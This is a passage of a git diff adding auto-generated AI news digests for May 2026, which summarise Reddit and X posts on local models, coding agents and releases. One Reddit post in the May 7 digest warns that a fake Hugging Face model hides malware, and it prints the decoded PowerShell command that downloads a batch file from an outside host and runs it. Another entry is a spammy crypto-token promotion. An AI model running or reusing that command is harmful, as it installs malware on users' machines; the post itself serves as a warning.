by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. The honest caveat from the author: this uses four reference projects and… + +--- + +## ["FLUX Creator Program" - New Flux models sooner than expected?](https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: open_source + +> are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post + +--- + +## [Best Open Source models for running on Gaming PC or Mac mini M4](https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/) +*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 +Tags: open_source + +> I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you! + +--- + +## [OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…](https://x.com/H_Mhatre_/status/2051715305890521578) +*X / @h_mhatre_* | 05/05/2026 | Score: 1.00 +Tags: tool_update + +> OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. $MSFT + +--- + diff --git a/data/digest-2026-05-06.md b/data/digest-2026-05-06.md new file mode 100644 index 0000000..c561332 --- /dev/null +++ b/data/digest-2026-05-06.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-06** | 15 stories | Auto-generated from 542 archived stories + +--- + +## [[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)](https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\_KVEdit\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. You will al… + +--- + +## [OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI](https://x.com/Reeperr131/status/2052074977973694608) +*X search / Agent workflows* | 06/05/2026 | Score: 1.00 +Tags: api_update, cli_tool, tool_update + +> OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI + +--- + +## [CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI](https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> Even with agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit) + +--- + +## [2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints](https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: api_update, product_launch, agent_tool + +> > **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo… + +--- + +## [Getting error "command 'claude-vscode.editor.openLast' not found", but not like anyone has talked about.](https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/) +*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, cli_tool + +> I've read many posts and github pages about this exact issue, but mine is different. Its not jsut that error. Any anthropic claude code command from logout to open in sidebar resutls in the error "Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found". I have tried to diagnose and fix the issue and its not working. Here is what is not working: 1. Claude sidebar not working 2. No claude commands from command pallete working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string. Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\Users\___\.vscode\extensions\anthropic.claude-code-2.1.129-win32-x64\extension.js:102:… + +--- + +## [UniReasoner: Using LLMs as "Universal Reasoners" to Fix Prompt Alignment](https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the "understanding-generation gap" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. This suggests that the model's "understanding" capacity is much stronger than its "generative" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. It produces a "grounded evaluation" in text, pinpointing exactly what is wrong (e.g., "Missing a bicyc… + +--- + +## [Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself](https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/) +*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedbacks are welcome!** + +--- + +## [Internal tools wIth no MCP](https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/) +*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. Im trying to figure out what and how the best way is to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP. + +--- + +## [Show HN: Adam – An embeddable cross-platform AI agent library](https://github.com/sqliteai/adam) +*Hacker News* | 06/05/2026 | Score: 0.96 +Tags: developer_tool, agent_tool + +--- + +## [The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)](https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: open_source + +> Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. A lot of you asked "cool, where's the code?" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \~87 tok/s Nemotron-3 Nano 30B (FP8): \~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco… + +--- + +## [Anyone else tried this RefineAnything LoRA? Pretty impressed so far](https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: developer_tool + +> Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I… + +--- + +## [I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4](https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: open_source + +> I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. # Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. (We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my… + +--- + +## [the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one pai…](https://x.com/NovaByArun/status/2052077319960047791) +*X search / AI vibes* | 06/05/2026 | Score: 1.00 +Tags: tool_update + +> the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one painful workflow. one credible audience. + +--- + +## [Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha](https://x.com/AzaleasWatkin/status/2052075760354238868) +*X search / Agent workflows* | 06/05/2026 | Score: 1.00 +Tags: mcp + +> Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha + +--- + +## [I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?](https://x.com/MichaelAzmy/status/2052075579424334002) +*X search / AI model updates* | 06/05/2026 | Score: 1.00 +Tags: product_launch + +> I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic? + +--- + diff --git a/data/digest-2026-05-07.md b/data/digest-2026-05-07.md new file mode 100644 index 0000000..000df5c --- /dev/null +++ b/data/digest-2026-05-07.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-07** | 15 stories | Auto-generated from 548 archived stories + +--- + +## [I embedded an AI agent in my shell. It can now run interactive programs.](https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: product_launch, open_source, developer_tool, cli_tool, agent_tool + +> I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te… + +--- + +## [I just tried Reactor's open source world model demo, here are my thoughts](https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/) +*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think! + +--- + +## [My Claude dreams at night and remembers everything. Better than mempalace.](https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: mcp, open_source, tool_update + +> Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No "remember this." No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. Five months… + +--- + +## [Claude Code: the only CLI where scrolling up is a premium feature](https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo "hello world" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The "workarounds": \- Ctrl+O transcript mode — congrats, you can now read your conversation history, but Claude is frozen while you do. It's like being told "you can look at your notes, but only if you stop the meeting." \- iTerm2's "Save lines to scrollback" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. But this is the equivalent of shi… + +--- + +## [why llama.cpp can’t combine speculative decode methods?](https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! [https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673) + +--- + +## [ClaudePlaysPokemon Opus 4.7 run ongoing!](https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the… + +--- + +## [Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…](https://x.com/xai/status/2052193877675983031) +*X / @xai* | 07/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business professionals. + +--- + +## [[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal](https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \- /remove (BiRefNet + pymatting matting refinement) \- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \- /face-restore (GFPGAN v1.4) \- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \- /useknockout/node \- /useknockout/react \- /useknockout/cli \- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! would be greatly appreciated! + +--- + +## [How I made $350K from an open-source JavaScript library using dual licensing](https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/) +*Hacker News* | 07/05/2026 | Score: 0.94 +Tags: open_source, developer_tool + +--- + +## [11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture](https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: open_source + +> I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \[\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an… + +--- + +## [[SCAM DO NOT USE!!] OpenOSS/privacy-filter](https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: api_update + +> Hey there! I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { "cmd": "\[Net.ServicePointManager\]::SecurityProtocol=\[Net.SecurityProtocolType\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention! + +--- + +## [I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]](https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/) +*Reddit r/MachineLearning* | 07/05/2026 | Score: 1.00 +Tags: open_source + +> **TL;DR**: Released en\_legal\_ner\_ind\_trf v0.1 - InLegalBERT fine-tuned on \~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. **Results** |Entity|F1|Support| |:-|:-|:-| |CASE\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. Not… + +--- + +## [OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…](https://x.com/AILeaksAndNews/status/2052440501421281507) +*X search / AI model updates* | 07/05/2026 | Score: 1.00 +Tags: api_update + +> OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI? + +--- + +## [the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector](https://x.com/DaveLimTV/status/2052440075766817143) +*X search / Agent workflows* | 07/05/2026 | Score: 1.00 +Tags: developer_tool + +> the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector + +--- + +## [OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?](https://x.com/testingcatalog/status/2052439728838808031) +*X / @testingcatalog* | 07/05/2026 | Score: 1.00 +Tags: product_launch + +> OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon? + +--- + diff --git a/data/digest-2026-05-08.md b/data/digest-2026-05-08.md new file mode 100644 index 0000000..09a2985 --- /dev/null +++ b/data/digest-2026-05-08.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-08** | 15 stories | Auto-generated from 552 archived stories + +--- + +## [I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions](https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/) +*Reddit r/ClaudeAI* | 08/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below). + +--- + +## [vLLM ROCm has been added to Lemonade as an experimental backend](https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/) +*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the 